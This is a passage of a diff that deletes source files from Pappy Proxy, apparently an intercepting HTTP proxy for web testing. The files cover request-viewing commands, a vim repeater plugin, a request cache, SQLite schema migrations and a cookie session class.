if kind in found_params[k]:
found_params[k][kind].append((reqid, v))
else:
found_params[k][kind] = [(reqid, v)]
def print_param_info(param_info):
for k, d in param_info.iteritems():
print Styles.TABLE_HEADER + k + Colors.ENDC
for param_type, valpairs in d.iteritems():
print param_type
value_ids = {}
for reqid, val in valpairs:
ids = value_ids.get(val, [])
ids.append(reqid)
value_ids[val] = ids
for val, ids in value_ids.iteritems():
if len(ids) <= 15:
idstr = ', '.join(ids)
else:
idstr = ', '.join(ids[:15]) + '...'
if val == '':
printstr = (Colors.RED + 'BLANK' + Colors.ENDC + 'x%d (%s)') % (len(ids), idstr)
else:
printstr = (Colors.GREEN + '%s' + Colors.ENDC + 'x%d (%s)') % (val, len(ids), idstr)
print printstr
print ''
####################
## Command functions
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def list_reqs(line):
"""
List the most recent in-context requests. By default shows the most recent 25
Usage: list [a|num]
If `a` is given, all the in-context requests are shown. If a number is given,
that many requests will be shown.
"""
args = shlex.split(line)
if len(args) > 0:
if args[0][0].lower() == 'a':
print_count = -1
else:
try:
print_count = int(args[0])
except:
print "Please enter a valid argument for list"
return
else:
print_count = 25
rows = []
ids = yield async_main_context_ids(print_count)
for i in ids:
req = yield Request.load_request(i)
rows.append(get_req_data_row(req))
print_request_rows(rows)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_request_info(line):
"""
View information about request
Usage: view_request_info <reqid(s)>
"""
args = shlex.split(line)
if not args:
raise PappyException("Request id is required")
reqids = args[0]
reqs = yield load_reqlist(reqids)
for req in reqs:
print ''
print_request_extended(req)
print ''
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_request_headers(line):
"""
View the headers of the request
Usage: view_request_headers <reqid(s)>
"""
args = shlex.split(line)
if not args:
raise PappyException("Request id is required")
reqid = args[0]
reqs = yield load_reqlist(reqid)
for req in reqs:
if len(reqs) > 1:
print 'Request %s:' % req.reqid
view_full_message(req, True)
if len(reqs) > 1:
print '-'*30
print ''
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_full_request(line):
"""
View the full data of the request
Usage: view_full_request <reqid(s)>
"""
args = shlex.split(line)
if not args:
raise PappyException("Request id is required")
reqid = args[0]
reqs = yield load_reqlist(reqid)
for req in reqs:
if len(reqs) > 1:
print 'Request %s:' % req.reqid
view_full_message(req, try_ws=True)
if len(reqs) > 1:
print '-'*30
print ''
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_request_bytes(line):
"""
View the raw bytes of the request. Use this if you want to redirect output to a file.
Usage: view_request_bytes <reqid(s)>
"""
args = shlex.split(line)
if not args:
raise PappyException("Request id is required")
reqid = args[0]
reqs = yield load_reqlist(reqid)
for req in reqs:
if len(reqs) > 1:
print 'Request %s:' % req.reqid
print req.full_message
if len(reqs) > 1:
print '-'*30
print ''
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def pretty_print_request(line):
"""
Print the body of the request pretty printed.
Usage: pretty_print_request <format> <reqid(s)>
"""
args = shlex.split(line)
if len(args) < 2:
raise PappyException("Usage: pretty_print_request <format> <reqid(s)>")
reqids = args[1]
reqs = yield load_reqlist(reqids)
for req in reqs:
pretty_print_body(args[0], req.body)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_response_headers(line):
"""
View the headers of the response
Usage: view_response_headers <reqid(s)>
"""
reqs = yield load_reqlist(line)
for req in reqs:
if req.response:
if len(reqs) > 1:
print '-'*15 + (' %s ' % req.reqid) + '-'*15
view_full_message(req.response, True)
else:
print "Request %s does not have a response" % req.reqid
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_full_response(line):
"""
View the full data of the response associated with a request
Usage: view_full_response <reqid>
"""
reqs = yield load_reqlist(line)
for req in reqs:
if req.response:
if len(reqs) > 1:
print '-'*15 + (' %s ' % req.reqid) + '-'*15
view_full_message(req.response)
else:
print "Request %s does not have a response" % req.reqid
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_response_bytes(line):
"""
View the full data of the response associated with a request
Usage: view_request_bytes <reqid(s)>
"""
reqs = yield load_reqlist(line)
for req in reqs:
if req.response:
if len(reqs) > 1:
print '-'*15 + (' %s ' % req.reqid) + '-'*15
print req.response.full_message
else:
print "Request %s does not have a response" % req.reqid
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def pretty_print_response(line):
"""
Print the body of the request pretty printed.
Usage: pretty_print_request <format> <reqid(s)>
"""
args = shlex.split(line)
if len(args) < 2:
raise PappyException("Usage: pretty_print_request <format> <reqid(s)>")
reqids = args[1]
reqs = yield load_reqlist(reqids)
for req in reqs:
if req.response:
pretty_print_body(args[0], req.response.body)
else:
print 'No response associated with request %s' % req.reqid
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def print_params_cmd(line):
"""
View the headers of the request
Usage: view_request_headers <reqid(s)>
"""
args = shlex.split(line)
reqid = args[0]
if len(args) > 1:
keys = args[1:]
else:
keys = None
reqs = yield load_reqlist(reqid)
for req in reqs:
if len(reqs) > 1:
print 'Request %s:' % req.reqid
print_params(req, keys)
if len(reqs) > 1:
print '-'*30
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def get_param_info(line):
args = shlex.split(line)
if args and args[0] == 'ct':
contains = True
args = args[1:]
else:
contains = False
if args:
params = tuple(args)
else:
params = None
def check_key(k, params, contains):
if contains:
for p in params:
if p.lower() in k.lower():
return True
else:
if params is None or k in params:
return True
return False
found_params = {}
ids = yield async_main_context_ids()
for i in ids:
req = yield Request.load_request(i)
for k, v in req.url_params.all_pairs():
if check_key(k, params, contains):
add_param(found_params, 'Url Parameter', k, v, req.reqid)
for k, v in req.post_params.all_pairs():
if check_key(k, params, contains):
add_param(found_params, 'POST Parameter', k, v, req.reqid)
for k, v in req.cookies.all_pairs():
if check_key(k, params, contains):
add_param(found_params, 'Cookie', k, v, req.reqid)
print_param_info(found_params)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def find_urls(line):
args = shlex.split(line)
reqs = yield load_reqlist(args[0])
url_regexp = r'((?:http|ftp|https)://(?:[\w_-]+(?:(?:\.[\w_-]+)+))(?:[\w.,@?^=%&:/~+#-]*[\w@?^=%&/~+#-])?)'
urls = set()
for req in reqs:
urls |= set(re.findall(url_regexp, req.full_message))
if req.response:
urls |= set(re.findall(url_regexp, req.response.full_message))
for url in sorted(urls):
print url
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def dump_response(line):
"""
Dump the data of the response to a file.
Usage: dump_response <id> <filename>
"""
# dump the data of a response
args = shlex.split(line)
reqs = yield load_reqlist(args[0])
for req in reqs:
if req.response:
rsp = req.response
if len(args) >= 2:
fname = args[1]
else:
fname = req.path.split('/')[-1]
with open(fname, 'w') as f:
f.write(rsp.body)
print 'Response data written to %s' % fname
else:
print 'Request %s does not have a response' % req.reqid
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def site_map(line):
"""
Print the site map. Only includes requests in the current context.
Usage: site_map
"""
args = shlex.split(line)
if len(args) > 0 and args[0] == 'p':
paths = True
else:
paths = False
ids = yield async_main_context_ids()
paths_set = set()
for reqid in ids:
req = yield Request.load_request(reqid)
if req.response and req.response.response_code != 404:
paths_set.add(req.path_tuple)
tree = sorted(list(paths_set))
if paths:
for p in tree:
print ('/'.join(list(p)))
else:
print_tree(tree)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'list': (list_reqs, None),
'view_request_info': (view_request_info, None),
'view_request_headers': (view_request_headers, None),
'view_full_request': (view_full_request, None),
'view_request_bytes': (view_request_bytes, None),
'pretty_print_request': (pretty_print_request, None),
'view_response_headers': (view_response_headers, None),
'view_full_response': (view_full_response, None),
'view_response_bytes': (view_response_bytes, None),
'pretty_print_response': (pretty_print_response, None),
'print_params': (print_params_cmd, None),
'param_info': (get_param_info, None),
'site_map': (site_map, None),
'dump_response': (dump_response, None),
'urls': (find_urls, None),
})
cmd.add_aliases([
('list', 'ls'),
('view_request_info', 'viq'),
('view_request_headers', 'vhq'),
('view_full_request', 'vfq'),
('view_full_request', 'kjq'),
('view_request_bytes', 'vbq'),
('pretty_print_request', 'ppq'),
('view_response_headers', 'vhs'),
('view_full_response', 'vfs'),
('view_full_response', 'kjs'),
('view_response_bytes', 'vbs'),
('pretty_print_response', 'pps'),
('print_params', 'pprm'),
('param_info', 'pri'),
('site_map', 'sm'),
#('dump_response', 'dr'),
])

View file

@ -1,136 +0,0 @@
import base64
import vim
import sys
import socket
import json
class CommError(Exception):
pass
def escape(s):
return s.replace("'", "''")
def communicate(data):
global PAPPY_PORT
# Submits data to the comm port of the proxy
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', int(vim.eval('s:commport'))))
datastr = json.dumps(data)
# Send our data
total_sent = 0
while total_sent < len(data):
sent = s.send(datastr[total_sent:])
assert sent != 0
total_sent += sent
s.send('\n')
# Get our response
retstr = ''
c = ''
while c != '\n':
retstr = retstr + c
c = s.recv(1)
assert c != ''
result = json.loads(retstr)
if not result['success']:
vim.command("echoerr '%s'" % escape(result['message']))
raise CommError(result['message'])
return result
def read_line(conn):
data = ''
c = ''
while c != '\n':
data = data + c
c = conn.read(1)
return data
def run_command(command):
funcs = {
"setup": set_up_windows,
"submit": submit_current_buffer,
}
if command in funcs:
funcs[command]()
def set_buffer_content(buf, text):
buf[:] = None
first = True
for l in text.split('\n'):
if first:
buf[0] = l
first = False
else:
buf.append(l)
def set_up_windows():
reqid = vim.eval("a:2")
comm_port = vim.eval("a:3")
vim.command("let s:commport=%d"%int(comm_port))
# Get the left buffer
vim.command("new")
vim.command("only")
b2 = vim.current.buffer
vim.command("let s:b2=bufnr('$')")
# Vsplit new file
vim.command("vnew")
b1 = vim.current.buffer
vim.command("let s:b1=bufnr('$')")
# Get the request
comm_data = {"action": "get_request", "reqid": reqid}
try:
reqdata = communicate(comm_data)
except CommError:
return
comm_data = {"action": "get_response", "reqid": reqid}
try:
rspdata = communicate(comm_data)
except CommError:
return
# Set up the buffers
set_buffer_content(b1, base64.b64decode(reqdata['full_message']))
if 'full_message' in rspdata:
set_buffer_content(b2, base64.b64decode(rspdata['full_message']))
# Save the port, ssl, host setting
vim.command("let s:repport=%d" % int(reqdata['port']))
vim.command("let s:rephost='%s'" % escape(reqdata['host']))
if reqdata['is_ssl']:
vim.command("let s:repisssl=1")
else:
vim.command("let s:repisssl=0")
def submit_current_buffer():
curbuf = vim.current.buffer
b2_id = int(vim.eval("s:b2"))
b2 = vim.buffers[b2_id]
vim.command("let s:b1=bufnr('$')")
vim.command("only")
vim.command("rightbelow vertical new")
vim.command("b %d" % b2_id)
vim.command("wincmd h")
full_request = '\n'.join(curbuf)
commdata = {'action': 'submit',
'full_message': base64.b64encode(full_request),
'tags': ['repeater'],
'port': int(vim.eval("s:repport")),
'host': vim.eval("s:rephost")}
if vim.eval("s:repisssl") == '1':
commdata["is_ssl"] = True
else:
commdata["is_ssl"] = False
result = communicate(commdata)
set_buffer_content(b2, base64.b64decode(result['response']['full_message']))
# (left, right) = set_up_windows()
# set_buffer_content(left, 'Hello\nWorld')
# set_buffer_content(right, 'Hello\nOther\nWorld')
#print "Arg is %s" % vim.eval("a:arg")
run_command(vim.eval("a:1"))

File diff suppressed because it is too large Load diff

View file

@ -1,9 +0,0 @@
import subprocess
import os
from pappyproxy import comm
def start_editor(reqid):
script_loc = os.path.join(os.path.dirname(__file__), "vim_repeater", "repeater.vim")
#print "RepeaterSetup %d %d"%(reqid, comm_port)
subprocess.call(["vim", "-S", script_loc, "-c", "RepeaterSetup %s %d"%(reqid, comm.comm_port)])

View file

@ -1,238 +0,0 @@
import time
import pappyproxy
from .sortedcollection import SortedCollection
from twisted.internet import defer
class RequestCache(object):
"""
An interface for loading requests. Stores a number of requests in memory and
leaves the rest on disk. Transparently handles loading requests from disk.
Most useful functions are :func:`pappyproxy.requestcache.RequestCache.get` to
get a request by id and :func:`pappyproxy.requestcache.RequestCache.req_id`
to iterate over requests starting with the most recent requests.
:ivar cache_size: The number of requests to keep in memory at any given time. This is the number of requests, so if all of the requests are to download something huge, this could still take up a lot of memory.
:type cache_size: int
"""
def __init__(self, cache_size=100, cust_dbpool=None):
self._cache_size = cache_size
if cache_size >= 100:
RequestCache._preload_limit = int(cache_size * 0.30)
self._cached_reqs = {}
self._last_used = {}
self._min_time = None
self.hits = 0
self.misses = 0
self.dbpool = cust_dbpool
self._next_in_mem_id = 1
self._preload_limit = 10
self.all_ids = set()
self.unmangled_ids = set()
self.ordered_ids = SortedCollection(key=lambda x: -self.req_times[x])
self.inmem_reqs = set()
self.req_times = {}
@property
def hit_ratio(self):
if self.hits == 0 and self.misses == 0:
return 0
return float(self.hits)/float(self.hits + self.misses)
def get_memid(self):
i = 'm%d' % self._next_in_mem_id
self._next_in_mem_id += 1
return i
@defer.inlineCallbacks
def load_ids(self):
if not self.dbpool:
self.dbpool = pappyproxy.http.dbpool
rows = yield self.dbpool.runQuery(
"""
SELECT id, start_datetime FROM requests;
"""
)
for row in rows:
if row[1]:
self.req_times[str(row[0])] = row[1]
else:
self.req_times[str(row[0])] = 0
if str(row[0]) not in self.all_ids:
self.ordered_ids.insert(str(row[0]))
self.all_ids.add(str(row[0]))
rows = yield self.dbpool.runQuery(
"""
SELECT unmangled_id FROM requests
WHERE unmangled_id is NOT NULL;
"""
)
for row in rows:
self.unmangled_ids.add(str(row[0]))
def resize(self, size):
if size >= self._cache_size or size == -1:
self._cache_size = size
else:
while len(self._cached_reqs) > size:
self._evict_single()
self._cache_size = size
@defer.inlineCallbacks
def get(self, reqid):
"""
Get a request by id
"""
if self.check(reqid):
self._update_last_used(reqid)
self.hits += 1
req = self._cached_reqs[reqid]
defer.returnValue(req)
else:
self.misses += 1
newreq = yield pappyproxy.http.Request.load_request(reqid, use_cache=False)
self.add(newreq)
defer.returnValue(newreq)
def check(self, reqid):
"""
Returns True if the id is cached, false otherwise
"""
return reqid in self._cached_reqs
def add(self, req):
"""
Add a request to the cache
"""
if not req.reqid:
req.reqid = self.get_memid()
if req.reqid[0] == 'm':
self.inmem_reqs.add(req)
if req.is_unmangled_version:
self.unmangled_ids.add(req.reqid)
if req.unmangled:
self.unmangled_ids.add(req.unmangled.reqid)
self._cached_reqs[req.reqid] = req
self._update_last_used(req.reqid)
self.req_times[req.reqid] = req.sort_time
if req.reqid not in self.all_ids:
self.ordered_ids.insert(req.reqid)
self.all_ids.add(req.reqid)
if len(self._cached_reqs) > self._cache_size and self._cache_size != -1:
self._evict_single()
def evict(self, reqid):
"""
Remove a request from the cache by its id.
"""
# Remove request from cache
if reqid in self._cached_reqs:
# Remove id from data structures
del self._cached_reqs[reqid]
del self._last_used[reqid]
# New minimum
self._update_min(reqid)
@defer.inlineCallbacks
def load(self, first, num):
"""
Load a number of requests after an id into the cache
"""
reqs = yield pappyproxy.http.Request.load_requests_by_time(first, num, cust_dbpool=self.dbpool, cust_cache=self)
for r in reqs:
self.add(r)
# Bulk loading is faster, so let's just say that loading 10 requests is
# 5 misses. We don't count hits since we'll probably hit them
self.misses += len(reqs)/2.0
def req_it(self, num=-1, ids=None, include_unmangled=False):
"""
A generator over all the requests in history when the function was called.
Generates deferreds which resolve to requests.
"""
count = 0
@defer.inlineCallbacks
def def_wrapper(reqid, load=False, num=1):
if not self.check(reqid) and load:
yield self.load(reqid, num)
req = yield self.get(reqid)
defer.returnValue(req)
over = list(self.ordered_ids)
for reqid in over:
if ids is not None and reqid not in ids:
continue
if not include_unmangled and reqid in self.unmangled_ids:
continue
do_load = True
if reqid in self.all_ids:
if count % self._preload_limit == 0:
do_load = True
if do_load and not self.check(reqid):
do_load = False
if (num - count) < self._preload_limit and num != -1:
loadnum = num - count
else:
loadnum = self._preload_limit
yield def_wrapper(reqid, load=True, num=loadnum)
else:
yield def_wrapper(reqid)
count += 1
if count >= num and num != -1:
break
def req_ids(self, num=-1, ids=None, include_unmangled=False):
"""
Returns a list of IDs
"""
retids = []
over = list(self.ordered_ids)
for reqid in over:
if ids is not None and reqid not in ids:
continue
if not include_unmangled and reqid in self.unmangled_ids:
continue
if reqid in self.all_ids:
retids.append(reqid)
if len(retids) >= num and num != -1:
break
return retids
@defer.inlineCallbacks
def load_by_tag(self, tag):
reqs = yield pappyproxy.http.Request.load_requests_by_tag(tag, cust_cache=self, cust_dbpool=self.dbpool)
for req in reqs:
self.add(req)
defer.returnValue(reqs)
def _evict_single(self):
"""
Evicts one item from the cache
"""
# Get the request
victim_id = self._min_time[0]
self.evict(victim_id)
def _update_min(self, updated_reqid=None):
new_min = None
if updated_reqid is None or self._min_time is None or self._min_time[0] == updated_reqid:
for k, v in self._last_used.iteritems():
if new_min is None or v < new_min[1]:
new_min = (k, v)
self._min_time = new_min
def _update_last_used(self, reqid):
t = time.time()
self._last_used[reqid] = t
self._update_min(reqid)
class RequestCacheIterator(object):
"""
An iterator to iterate over requests in history through the request cache.
"""
pass

View file

@ -1,54 +0,0 @@
from twisted.internet import defer
"""
Schema v1
Description:
The initial schema for the first version of the proxy. It includes the creation
of the schema_meta table and other data tables.
"""
update_queries = [
"""
CREATE TABLE responses (
id INTEGER PRIMARY KEY AUTOINCREMENT,
full_response BLOB NOT NULL,
unmangled_id INTEGER REFERENCES responses(id)
);
""",
"""
CREATE TABLE requests (
id INTEGER PRIMARY KEY AUTOINCREMENT,
full_request BLOB NOT NULL,
tag TEXT,
submitted INTEGER NOT NULL,
response_id INTEGER REFERENCES responses(id),
unmangled_id INTEGER REFERENCES requests(id),
start_datetime TEXT,
end_datetime TEXT
);
""",
"""
CREATE TABLE schema_meta (
version INTEGER NOT NULL
);
""",
"""
CREATE TABLE scope (
filter_order INTEGER NOT NULL,
filter_string TEXT NOT NULL
);
""",
"""
INSERT INTO schema_meta (version) VALUES (1);
""",
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)

View file

@ -1,55 +0,0 @@
from pappyproxy import http
from twisted.internet import defer
"""
Schema v2
Description:
Adds support for specifying the port of a request and specify its port. This
lets requests that have the port/ssl settings specified in the CONNECT request
maintain that information.
"""
update_queries = [
"""
ALTER TABLE requests ADD COLUMN port INTEGER;
""",
"""
ALTER TABLE requests ADD COLUMN is_ssl INTEGER;
""",
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)
# Update metadata for each request
reqrows = yield dbpool.runQuery(
"""
SELECT id, full_request
FROM requests;
""",
)
# Create an object and get its port/is_ssl
for reqrow in reqrows:
reqid = reqrow[0]
fullreq = reqrow[1]
r = http.Request(fullreq)
port = r.port
is_ssl = r.is_ssl
yield dbpool.runQuery(
"""
UPDATE requests SET port=?,is_ssl=? WHERE id=?;
""",
(port, is_ssl, reqid)
)
yield dbpool.runQuery(
"""
UPDATE schema_meta SET version=2;
"""
)

View file

@ -1,34 +0,0 @@
from pappyproxy import http
from twisted.internet import defer
"""
Schema v3
Description:
Adds tables to store tags associated with requests
"""
update_queries = [
"""
CREATE TABLE tags (
id INTEGER PRIMARY KEY AUTOINCREMENT,
tag TEXT NOT NULL
);
""",
"""
CREATE TABLE tagged (
reqid INTEGER REFERENCES requests(id),
tagid INTEGER REFERENCES tags(id)
);
""",
"""
UPDATE schema_meta SET version=3;
""",
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)

View file

@ -1,50 +0,0 @@
from pappyproxy import http
from twisted.internet import defer
"""
Schema v4
Description:
Adds additional metadata to the database for requests. Mainly it stores the host
that a request was sent to so that pappy doesn't have to guess from the host
header.
"""
update_queries = [
"""
ALTER TABLE requests ADD COLUMN host TEXT;
""",
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)
# Update metadata for each request
reqrows = yield dbpool.runQuery(
"""
SELECT id, full_request
FROM requests;
""",
)
# Create an object that will parse the host from the request
for reqrow in reqrows:
reqid = reqrow[0]
fullreq = reqrow[1]
r = http.Request(fullreq)
host = r.host
if r.host:
yield dbpool.runQuery(
"""
UPDATE requests SET host=? WHERE id=?;
""",
(host, reqid)
)
yield dbpool.runQuery(
"""
UPDATE schema_meta SET version=4;
"""
)

View file

@ -1,29 +0,0 @@
from pappyproxy import http
from twisted.internet import defer
"""
Schema v5
Description:
Adds a column to the requests table which will store a dict that plugins can
use to store metadata about requests.
"""
update_queries = [
"""
ALTER TABLE requests ADD COLUMN plugin_data TEXT;
""",
"""
UPDATE requests SET plugin_data="{}";
""",
"""
UPDATE schema_meta SET version=5;
"""
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)

View file

@ -1,87 +0,0 @@
import time
import datetime
from pappyproxy import http
from twisted.internet import defer
"""
Schema v6
Description:
Replaces the string representation of times with unix times so that we can select
by most recent first. Also deletes old tag column.
"""
update_queries = [
"""
CREATE TABLE requests_new (
id INTEGER PRIMARY KEY AUTOINCREMENT,
full_request BLOB NOT NULL,
submitted INTEGER NOT NULL,
response_id INTEGER REFERENCES responses(id),
unmangled_id INTEGER REFERENCES requests(id),
port INTEGER,
is_ssl INTEGER,
host TEXT,
plugin_data TEXT,
start_datetime REAL,
end_datetime REAL
);
""",
"""
INSERT INTO requests_new (id, full_request, submitted, response_id, unmangled_id, port, is_ssl, host, plugin_data) SELECT id, full_request, submitted, response_id, unmangled_id, port, is_ssl, host, plugin_data FROM requests;
""",
]
drop_queries = [
"""
DROP TABLE requests;
""",
"""
ALTER TABLE requests_new RENAME TO requests;
"""
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)
reqrows = yield dbpool.runQuery(
"""
SELECT id, start_datetime, end_datetime
FROM requests;
""",
)
new_times = []
for row in reqrows:
reqid = row[0]
if row[1]:
start_datetime = datetime.datetime.strptime(row[1], "%Y-%m-%dT%H:%M:%S.%f")
start_unix_time = time.mktime(start_datetime.timetuple())
else:
start_unix_time = None
if row[2]:
end_datetime = datetime.datetime.strptime(row[2], "%Y-%m-%dT%H:%M:%S.%f")
end_unix_time = time.mktime(end_datetime.timetuple())
else:
end_unix_time = None
new_times.append((reqid, start_unix_time, end_unix_time))
for reqid, start_unix_time, end_unix_time in new_times:
yield dbpool.runQuery(
"""
UPDATE requests_new SET start_datetime=?, end_datetime=? WHERE id=?;
""", (start_unix_time, end_unix_time, reqid)
)
for query in drop_queries:
yield dbpool.runQuery(query)
yield dbpool.runQuery(
"""
UPDATE schema_meta SET version=6;
"""
)

View file

@ -1,23 +0,0 @@
from twisted.internet import defer
"""
Schema v7
Creates an index for requests on start time in the data file. This will make
iterating through history a bit faster.
"""
update_queries = [
"""
CREATE INDEX ind_start_time ON requests(start_datetime);
""",
"""
UPDATE schema_meta SET version=7;
"""
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)

View file

@ -1,39 +0,0 @@
from twisted.internet import defer
"""
Schema v8
Creates a table for saved contexts and for web socket messages. Saved contexts
are saved as a json list of filter strings.
"""
update_queries = [
"""
CREATE TABLE saved_contexts (
id INTEGER PRIMARY KEY AUTOINCREMENT,
context_name TEXT UNIQUE,
filter_strings TEXT
);
""",
"""
CREATE TABLE websocket_messages (
id INTEGER PRIMARY KEY AUTOINCREMENT,
parent_request INTEGER REFERENCES requests(id),
unmangled_id INTEGER REFERENCES websocket_messages(id),
is_binary INTEGER,
direction INTEGER,
time_sent REAL,
contents BLOB
);
""",
"""
UPDATE schema_meta SET version=8;
"""
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)

View file

@ -1,99 +0,0 @@
import os
import glob
import imp
import random
from twisted.internet import reactor
from twisted.enterprise import adbapi
from twisted.internet import defer
@defer.inlineCallbacks
def get_schema_version(dbpool):
schema_exists = yield dbpool.runQuery("SELECT name FROM sqlite_master WHERE type='table' AND name='schema_meta';")
if not schema_exists:
# If we get an empty list, we have no schema
defer.returnValue(0)
else:
schema_version_result = yield dbpool.runQuery("SELECT version FROM schema_meta;")
# There should only be one row in the meta table
assert(len(schema_version_result) == 1)
# Return the retrieved version
version = schema_version_result[0][0]
defer.returnValue(version)
def add_schema_files(schemas):
# Finds and imports all schema_*.py files into the list
module_files = glob.glob(os.path.dirname(os.path.abspath(__file__)) + "/schema_*.py")
for mod in module_files:
module_name = os.path.basename(os.path.splitext(mod)[0])
newmod = imp.load_source('%s'%module_name, mod)
schemas.append( (module_name, newmod) )
def copy_file(a, b):
a_bytes = a.read(1024)
while a_bytes:
b.write(a_bytes)
a_bytes = a.read(1024)
def create_backup(filename):
backup = filename + '.bak'
while os.path.isfile(backup):
backup = '%s.%d' % (backup, random.randint(0, 9999999999))
# Make sure backup file has secure permissions
with os.fdopen(os.open(backup, os.O_CREAT, 0o0600), 'r') as f:
pass
# Copy the datafile
with open(filename, 'r') as a:
with open(backup, 'w') as b:
copy_file(a, b)
return backup
@defer.inlineCallbacks
def update_schema(dbpool, filename):
# Update the database schema to the latest version
schema_version = yield get_schema_version(dbpool)
if schema_version == 0:
verbose_update = False
else:
verbose_update = True
schemas = []
add_schema_files(schemas)
schemas = sorted(schemas, key=lambda tup: tup[0])
to_run = range(schema_version, len(schemas))
if len(to_run) > 0:
# Back up data file
if verbose_update:
print 'Backing up data file'
backup = create_backup(filename)
if verbose_update:
print 'Backed up to %s' % backup
try:
for i in to_run:
# schemas[0] is v1, schemas[1] is v2, etc
if verbose_update:
print "Updating datafaile schema to version %d" % (i+1)
yield schemas[i][1].update(dbpool)
# Delete backup
os.remove(backup)
if verbose_update:
print 'Update successful! Deleted backup'
except Exception as e:
# restore the backup
print 'Update failed, restoring backup'
with open(filename, 'w') as a:
with open(backup, 'r') as b:
copy_file(b, a)
os.remove(backup)
raise e
@defer.inlineCallbacks
def main():
dbpool = adbapi.ConnectionPool("sqlite3", "data.db", check_same_thread=False)
yield update_schema(dbpool)
reactor.stop()
if __name__ == '__main__':
reactor.callWhenRunning(main)
reactor.run()

View file

@ -1,180 +0,0 @@
from .http import ResponseCookie
class Session(object):
"""
A class used to maintain a session over multiple requests. Can remember cookies
and apply a specific header to requests. It is also possible to give the session
a list of cookie names and it will only save those cookies.
"""
def __init__(self, cookie_names=None, header_names=None,
cookie_vals=None, header_vals=None):
"""
Session(self, cookie_names=None, header_names=None, cookie_vals=None, header_vals=None)
Constructor
:param cookie_names: A whitelist for cookies that should be saved from :func:`~pappyproxy.session.Session.save_req` and :func:`~pappyproxy.session.Session.save_rsp` in the session. If no values are given, all cookies will be saved.
:param header_names: A whitelist for headers that should be saved from :func:`~pappyproxy.session.Session.save_req` in the session. If no values are given, no headers will be saved.
:param cookie_vals: A dictionary of cookies to populate the session session with. The key should be the cookie name, and the value can be either a string or a :class:`~pappyproxy.http.ResponseCookie`. If a :class:`~pappyproxy.http.ResponseCookie` is given, its flags will be used in :func:`~pappyproxy.session.Session.apply_rsp`.
:param header_vals: A dictionary of header values to populate the session with. The key should be the header name and the value should be a string which should be the header value.
"""
self.cookies = cookie_names or []
self.headers = header_names or []
self.cookie_vals = cookie_vals or {}
self.header_vals = header_vals or {}
if cookie_vals:
for k, v in cookie_vals.iteritems():
if k not in self.cookies:
self.cookies.append(k)
if header_vals:
for k, v in header_vals.iteritems():
if k not in self.headers:
self.headers.append(k)
def _cookie_obj(self, k, v):
"""
Returns the value as a cookie object regardless of if the cookie is a string or a ResponseCookie.
"""
if isinstance(v, ResponseCookie):
return v
else:
cookie_str = '%s=%s' % (k, v)
return ResponseCookie(cookie_str)
def _cookie_val(self, v):
"""
Returns the value of the cookie regardless of if the value is a string or a ResponseCookie
"""
if isinstance(v, ResponseCookie):
return v.val
else:
return v
def apply_req(self, req):
"""
apply_req(request)
Apply saved headers and cookies to the request
"""
for k, v in self.cookie_vals.iteritems():
req.cookies[k] = self._cookie_val(v)
for k, v in self.header_vals.iteritems():
req.headers[k] = v
def apply_rsp(self, rsp):
"""
apply_rsp(response)
Will add a Set-Cookie header for each saved cookie. Will not
apply any saved headers. If the cookie was added from a call to
:func:`~pappyproxy.session.Session.save_rsp`, the Set-Cookie flags
will be the same as the original response.
"""
for k, v in self.cookie_vals.iteritems():
val = self._cookie_obj(k, v)
rsp.set_cookie(val)
# Don't apply headers to responses
def save_req(self, req, cookies=None, headers=None):
"""
save_req(req, cookies=None, headers=None)
Updates the state of the session from the given request.
Cookie and headers can be added to their whitelists by passing in a list
for either ``cookies`` or ``headers``.
"""
if cookies:
for c in cookies:
if c not in self.cookies:
self.cookies.append(c)
if headers:
for h in headers:
if h not in self.headers:
self.headers.append(h)
if cookies:
for cookie in cookies:
if cookie in req.cookies:
if cookie not in self.cookies:
self.cookies.append(cookie)
cookie_str = '%s=%s' % (cookie, req.cookies[cookie])
self.cookie_vals[cookie] = ResponseCookie(cookie_str)
else:
for k, v in req.cookies.all_pairs():
if k in self.cookies:
cookie_str = '%s=%s' % (k, v)
self.cookie_vals[cookie] = ResponseCookie(cookie_str)
if headers:
for header in headers:
if header in self.headers:
self.header_vals[header] = req.headers[header]
def save_rsp(self, rsp, cookies=None, save_all=False):
"""
save_rsp(rsp, cookies=None)
Update the state of the session from the response. Only cookies can be
updated from a response. Additional values can be added to the whitelist
by passing in a list of values for the ``cookies`` parameter. If save_all
is given, all set cookies will be added to the session.
"""
if cookies:
for c in cookies:
if c not in self.cookies:
self.cookies.append(c)
if cookies:
for cookie in cookies:
if cookie in rsp.cookies:
if cookie not in self.cookies:
self.cookies.append(cookie)
self.cookie_vals[cookie] = rsp.cookies[cookie]
else:
for k, v in rsp.cookies.all_pairs():
if save_all:
self.cookie_vals[v.key] = v
if not v.key in self.cookies:
self.cookies.append(v.key)
elif v.key in self.cookies:
